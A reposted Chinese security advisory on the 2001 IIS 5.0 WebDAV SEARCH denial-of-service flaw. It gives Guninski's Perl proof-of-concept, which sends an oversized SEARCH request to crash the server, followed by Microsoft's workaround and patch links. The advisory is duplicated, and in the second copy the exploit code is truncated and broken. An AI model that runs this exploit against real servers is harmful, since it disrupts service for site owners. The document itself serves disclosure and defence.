神马文学网IIS 5.0 SEARCH 方法远程攻击漏洞
来源:百度文库 编辑:神马文学网 时间:2024/04/29 20:31:21
发布日期:2001-03-20
更新日期:2001-03-20
受影响系统:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000描述:
WebDAV是HTTP协议的扩展,允许从远程来编写和管理Web内容。微软IIS 5.0的WebDAV在
处理某些畸形的请求时存在缺陷,当提交一个超长的SEARCH请求时可以使IIS 服务重启。
<* 来源: Georgi Guninski (guninski@GUNINSKI.COM)
http://www.guninski.com
*>
测试方法:警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (guninski@GUNINSKI.COM)提供了如下测试代码:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml=‘SELECT DAV:displayname from SCOPE("‘.$over.‘")
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------
建议:
临时解决方法:
微软给出一个禁止WebDAV的临时解决办法(http://www.microsoft.com/technet/support/kb.asp?ID=241520):
1、先停止IIS服务。可以在命令行下敲“IISRESET /STOP”命令。
2、禁止everyone访问Httpext.dll:
CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone
3、再启动IIS服务:IISRESET /START
厂商补丁:
微软已经为此发布了一个安全公告(MS-016):
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp
补丁程序(目前只有英文版):
Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564
更新日期:2001-03-20
受影响系统:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000描述:
WebDAV是HTTP协议的扩展,允许从远程来编写和管理Web内容。微软IIS 5.0的WebDAV在
处理某些畸形的请求时存在缺陷,当提交一个超长的SEARCH请求时可以使IIS 服务重启。
<* 来源: Georgi Guninski (guninski@GUNINSKI.COM)
http://www.guninski.com
*>
测试方法:警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (guninski@GUNINSKI.COM)提供了如下测试代码:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml=‘
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------
建议:
临时解决方法:
微软给出一个禁止WebDAV的临时解决办法(http://www.microsoft.com/technet/support/kb.asp?ID=241520):
1、先停止IIS服务。可以在命令行下敲“IISRESET /STOP”命令。
2、禁止everyone访问Httpext.dll:
CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone
3、再启动IIS服务:IISRESET /START
厂商补丁:
微软已经为此发布了一个安全公告(MS-016):
http://www.microsoft.com/technet/security/bulletin/MS01-016.asp
补丁程序(目前只有英文版):
Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564
IIS 5.0 SEARCH 方法远程攻击漏洞
5.5 ASP漏洞攻击
5.5 ASP漏洞攻击
IIS5.0 .printer远程溢出漏洞
跨浏览器攻击Clickjacking漏洞解决方案
微软IE6/7漏洞攻击直线上升
日发展远程攻击武器威胁亚洲
Caucho Resin viewfile远程文件及路径泄露漏洞
大规模攻击一触即发 360紧急发布IE漏洞独家补丁
WPA2协议爆漏洞:或从内部遭受攻击
另类方法防威金攻击
兰德:轰六挂远程导弹可直接攻击美国本土
兰德:轰六挂远程导弹可直接攻击美国本土[2]
兰德:轰六挂远程导弹可直接攻击美国本土[3]
兰德称轰六挂远程巡航导弹可直接攻击美本土
中国能攻击美国的远程导弹已批量服役
Email可攻击IE漏洞 专家预言将出现攻击风暴
IIS 6 的 PHP 最佳配置方法
IIS与Apache共用80端口方法
WINXP下IIS+asp.net架设方法
精简版XP的IIS安装方法
不关机重启IIS的方法
精简版XP的IIS安装方法
IIS与Apache共用80端口方法